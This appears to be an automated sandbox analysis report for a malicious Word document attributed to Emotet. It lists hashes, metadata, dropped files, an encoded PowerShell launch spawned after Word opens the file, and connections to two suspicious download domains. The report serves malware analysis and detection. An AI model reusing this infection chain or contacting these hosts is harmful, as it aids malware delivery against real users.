Field | Value |
---|---|
File name: | Complaint from 11_05_2019.doc |
Full analysis: | https://app.any.run/tasks/f04068e1-1128-4943-9e86-4dc6afb72079 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into highly destructive malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:51:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolorum magnam at., Author: Belo Bahno, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 4 21:57:00 2019, Last Saved Time/Date: Mon Nov 4 21:57:00 2019, Number of Pages: 1, Number of Words: 37, Number of Characters: 211, Security: 0 |
MD5: | C88270CDCF66121C5D27BCD28584DAEC |
SHA1: | 44FB953A81A9CAD354EAD8323694281E09D1F825 |
SHA256: | DACD64F04CAF7E87BBB8214EB8ABD58C91628C08C18E8068AA1D84575F7D350A |
SSDEEP: | 6144:TbSRZDlzfhxYAgOLA+bPMpzCyFU+QrA/2:TbSRZDlzfNgUjbPGCMU+y |
Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Tag_MarkAsFinal: | -1 |
CodePage: | Windows Latin 1 (Western European) |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 247 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
Security: | None |
Characters: | 211 |
Words: | 37 |
Pages: | 1 |
ModifyDate: | 2019:11:04 21:57:00 |
CreateDate: | 2019:11:04 21:57:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | - |
Comments: | - |
Keywords: | - |
Author: | Belo Bahno |
Subject: | - |
Title: | Dolorum magnam at. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1160 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Complaint from 11_05_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | | |
3976 | powershell -enco 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB5D.tmp.cvr | — | — | — |
3976 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YX5O42GRLZSHNCL2I8ZB.temp | — | — | — |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EC061EF.wmf | wmf | 4901FDA4D969892496D9C32CAF950699 | B0AE0083038CF002A9D51E390FE7CB8238AA2AFF3A9A255074F1CCE0256798D0 |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 6AAB9CA27F6D3E541292196F7C5B86F3 | EE1618B82D891F8400937A45217EF20AF3427A36F945447E05537ACC0315DD03 |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4518D2.wmf | wmf | C72BCFED6D45D52620986B885CE8B254 | D137B038410A9F4EF2E57FB3D06BDC23C366C313D8411BE53EAA43CA989AC81D |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D593F0D5.wmf | wmf | D46477AF55E11A5874F5C1CA693591B2 | C187D180FCF20B438D0CD6B43A1FD8002DD01870A53EAD1CA9F6531B8BF3726F |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAE7EEAB.wmf | wmf | 3F2B6EDBAF5EA79369FC31A079DEAC39 | 425D5507AE5FF861610E1EED8D723936C1F6391B07453F591AD3208CA7D82845 |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0040FC.wmf | wmf | EBEC1715A9B54681B9AA046B43B00706 | 675EF5DAC133FB8820F00867D477B909DCB207CC170C8A93C1FAC84A7799B65D |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$mplaint from 11_05_2019.doc | pgc | 8138EC10E1147AF0E07929CC3D035A29 | 352C8C27FCA27D2C22D6C59F3401277192880A302DDF99FEFF1EFE5BEED1AA9B |
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F6368F1.wmf | wmf | 8BF461A284F325A8156EC0B6A341AAE9 | EAD1A9103DA2FBC72D8CCD61E68B5BCFB4CC45D2383CB725E00DD20E31A5719F |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3976 | powershell.exe | 172.1.1.1:80 | www.ioi3.com | AT&T Services, Inc. | US | unknown |
3976 | powershell.exe | 198.12.145.239:443 | www.mentorspedia.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.ioi3.com | | suspicious |
dns.msftncsi.com | | shared |
www.mentorspedia.com | | suspicious |